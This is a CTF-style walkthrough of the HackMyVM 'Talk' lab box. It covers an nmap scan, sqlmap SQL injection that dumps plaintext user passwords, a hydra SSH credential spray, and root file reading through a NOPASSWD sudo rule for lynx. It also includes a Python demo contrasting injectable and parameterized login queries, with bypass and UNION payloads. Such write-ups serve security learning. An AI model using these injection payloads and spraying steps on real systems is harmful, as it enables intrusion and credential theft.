
HMV-Talk

HMV-Talk box walkthrough

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 11:09 CST
Nmap scan report for bogon (192.168.112.47)
Host is up (0.0024s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e3:fc:1b:74:e5:e3:c9:ef:6d:ac:df:b1:1e:47:83:ad (RSA)
| 256 10:bd:60:33:a0:d1:a4:7d:de:c8:29:0a:c4:7d:b1:aa (ECDSA)
|_ 256 4b:fc:30:a8:12:69:e7:b2:ce:ad:99:f1:66:12:cd:8c (ED25519)
80/tcp open http nginx 1.14.2
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: chatME
|_http-server-header: nginx/1.14.2
MAC Address: 7E:2E:BE:B7:58:B6 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.40 ms bogon (192.168.112.47)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

Web enumeration


Port 80 serves a login page, but it also lets you register an account. After registering and logging in you land in a chat box. (Two things from the scan are worth noting: nginx 1.14.2 fronting PHP, and the PHPSESSID cookie set without the HttpOnly flag.)

A directory scan turned up nothing else, and the login form cannot be brute-forced, so the next thing to try is SQL injection. Capture the login request in Burp, save the raw request to a text file, and point sqlmap at that file with the injection parameter set to username. sqlmap confirms the injection; from there it is a matter of enumerating databases, tables and columns to pull out the account credentials.

┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp.txt
POST //login.php HTTP/1.1
Host: 192.168.112.47
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.112.47
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.112.47//index.php?attempt=failed
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=mb3h6lao2hsvuiiduk34js813o
Connection: close

username=111&password=111

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch --dbs
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat --tables
[3 tables]
+-----------+
| user |
| chat |
| chat_room |
+-----------+

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat -T user --columns --dump
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| email | varchar(255) |
| password | varchar(30) |
| phone | varchar(255) |
| userid | int(11) |
| username | varchar(30) |
| your_name | varchar(60) |
+-----------+--------------+

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat -T user -C username,password --dump

+----------+-----------------+
| username | password |
+----------+-----------------+
| david | adrianthebest |
| tina | davidwhatpass |
| kakeru | kakeru |
| nona | myfriendtom |
| pao | pao |
| jerry | thatsmynonapass |
+----------+-----------------+

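To make the injection step concrete, here is an added example (not code from the box or from the author) of a login query built the way the successful injection implies, next to the parameterized version. It uses SQLite as a stand-in for the box's MySQL and seeds it with the rows from the dump above; the two payloads are my own minimal illustrations of an auth bypass and a UNION dump, not what sqlmap actually sent.

```python
import sqlite3

# Constructed stand-in for the box's chat.user table: SQLite instead of MySQL,
# rows copied from the sqlmap dump above. Assumed: the login query is built by
# string concatenation, which is what the successful injection implies.
USERS = [
    ("david", "adrianthebest"),
    ("tina", "davidwhatpass"),
    ("kakeru", "kakeru"),
    ("nona", "myfriendtom"),
    ("pao", "pao"),
    ("jerry", "thatsmynonapass"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (userid INTEGER PRIMARY KEY, "
        "username VARCHAR(30), password VARCHAR(30))"
    )
    conn.executemany("INSERT INTO user (username, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login the way the injectable form behaves: user input is spliced into
    the SQL text, so the attacker controls the grammar, not just a value."""
    sql = (
        "SELECT username FROM user "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql).fetchall()]


def login_safe(conn, username, password):
    """Same query with bound parameters: input is always a value."""
    sql = "SELECT username FROM user WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password)).fetchall()]


# Payloads for the username field (the parameter sqlmap was pointed at).
# The trailing space after -- matters on MySQL, where the comment marker is "-- ".
BYPASS = "david' -- "
# One-column UNION that returns every credential pair; SQLite concatenates
# with ||, on MySQL this would be CONCAT(username, ':', password).
DUMP = "' UNION SELECT username || ':' || password FROM user -- "


def demo():
    conn = make_db()
    return {
        "bypass_vulnerable": login_vulnerable(conn, BYPASS, ""),
        "bypass_safe": login_safe(conn, BYPASS, ""),
        "dump_vulnerable": sorted(login_vulnerable(conn, DUMP, "")),
        "real_login_safe": login_safe(conn, "nona", "myfriendtom"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The bypass payload closes the string literal and comments out the password check, so the concatenated query logs in as david with no password; the UNION payload turns the same single-column SELECT into a dump of the whole table, which is what the sqlmap `--dump` run above automates. The parameterized version treats both payloads as ordinary (non-matching) usernames.
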
The user table stores passwords in plaintext (the password column is varchar(30) and the dump reads as-is), so the credentials can be replayed directly. Put the usernames in user.txt and the passwords in pass.txt and spray SSH with hydra; -L/-P try every user against every password, which matters here because people reuse other people's passwords rather than their own:

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L user.txt -P pass.txt ssh://192.168.112.47
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 12:06:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.112.47:22/
[22][ssh] host: 192.168.112.47 login: nona password: thatsmynonapass
[22][ssh] host: 192.168.112.47 login: david password: davidwhatpass
[22][ssh] host: 192.168.112.47 login: jerry password: myfriendtom
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 12:06:19

Privilege escalation

All three SSH hits are cross-matches (nona logs in with jerry's chat password, david with tina's, jerry with nona's), which is why the grid spray found them. Log in as nona; sudo -l shows a single NOPASSWD entry:

nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
(ALL : ALL) NOPASSWD: /usr/bin/lynx

That binary is lynx, a text-mode web browser. It accepts file:// URLs, so running it as root through sudo reads any file on the box, including the root flag. (Lynx also has a shell-escape command, `!`, unless it is started with -restrictions, so a NOPASSWD rule for it is effectively full root, not just a file read.)

nona@talk:~$ sudo /usr/bin/lynx file:///root/root.txt